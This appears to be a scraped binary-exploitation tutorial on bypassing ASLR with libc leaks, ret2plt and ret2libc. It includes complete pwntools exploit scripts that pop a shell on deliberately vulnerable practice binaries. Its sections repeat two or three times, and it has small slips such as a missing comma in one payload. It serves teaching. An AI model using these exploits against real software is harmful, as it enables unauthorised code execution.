1 of 4

ASLR

Address Space Layout Randomisation

Overview

ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.

While it's tempting to think of ASLR as libc PIE, there is a key difference.

ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependant on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.

Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system for a ret2libc).

The Format String Trap

It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.

When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.

Instead, a more reliable way is reading the GOT entry of a specific function.

Double-Checking

For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.

ASLR Bypass with Given Leak

The Source

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %lp\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Just as we did for PIE, except this time we print the address of system.

Analysis

$ ./vuln-32 
System is at: 0xf7de5f00

Yup, does what we expected.

Your address of system might end in different characters - you just have a different libc version

Exploitation

Much of this is as we did with PIE.

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate libc base from that (as we did with PIE):

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

64-bit

Try it yourself :)

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

Instead, you could do:

binsh = next(libc.search(b'/bin/sh'))

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

p.sendline(rop.chain())

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

PLT and GOT

Bypassing ASLR

The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the fucntionality. For example, each ELF file will not carry their own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.

When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. Check it out in GDB:

Why does it do that?

Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and stores it in the GOT.

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc, and the GOT is within the binary.

The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.

The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.

Exploiting an Arbitrary Read

There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be return but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.

ret2plt

A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting in order to call it again and enable you to

# 32-bit ret2plt
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts']
    elf.plt['puts'],
    elf.symbols['main']
)

flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time

%s format string

This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.

payload = p32(elf.got['puts'])      # p64() if 64-bit
payload += b'|'
payload += b'%3$s'                  # The third parameter points at the start of the buffer


# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|')                   # This is not required
puts_leak = u32(p.recv(4))          # 4 bytes because it's 32-bit

Summary

The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc of functions you use and stores them in the GOT
- Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc base

ret2plt ASLR bypass

Overview

This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.

Analysis

We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets() takes in as much data as we want.

Exploitation

All the basic setup

Now we want to send a payload that leaks the real address of puts. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out it's actual location. This is because in C string arguments for functions actually take a pointer to where the string can be found, so pointing it to the GOT entry (which we know the location of) will print it out.

But why is there a main there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main again, however, we essentially restart the binary - except we now know libc base so this time around we can do a ret2libc.

Remember that the GOT entry won't be the only thing printed - puts, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32() to interpret them as a little-endian number. After that we ignore the the rest of the values as well as the Come get me from calling main again.

From here, we simply calculate libc base again and perform a basic ret2libc:

And bingo, we have a shell!

Final Exploit

64-bit

You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P

ret2plt ASLR bypass

Overview

This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.

Analysis

We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets() takes in as much data as we want.

Exploitation

All the basic setup

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()        # just receive the first output

payload = flat(
    'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

From here, we simply calculate libc base again and perform a basic ret2libc:

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],            # exit is not required here, it's just nicer
    next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

And bingo, we have a shell!

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
    'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

64-bit

You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P

PLT and GOT

Bypassing ASLR

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.

When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. Check it out in GDB:

Why does it do that?

Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc, and the GOT is within the binary.

Exploiting an Arbitrary Read

ret2plt

# 32-bit ret2plt
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts']
    elf.plt['puts'],
    elf.symbols['main']
)

flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time

%s format string

This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.

payload = p32(elf.got['puts'])      # p64() if 64-bit
payload += b'|'
payload += b'%3$s'                  # The third parameter points at the start of the buffer


# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|')                   # This is not required
puts_leak = u32(p.recv(4))          # 4 bytes because it's 32-bit

Summary

The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc of functions you use and stores them in the GOT
- Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc base

ASLR Bypass with Given Leak

The Source

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %lp\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Just as we did for PIE, except this time we print the address of system.

Analysis

$ ./vuln-32 
System is at: 0xf7de5f00

Yup, does what we expected.

Your address of system might end in different characters - you just have a different libc version

Exploitation

Much of this is as we did with PIE.

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate libc base from that (as we did with PIE):

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

64-bit

Try it yourself :)

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

Instead, you could do:

binsh = next(libc.search(b'/bin/sh'))

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

p.sendline(rop.chain())

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.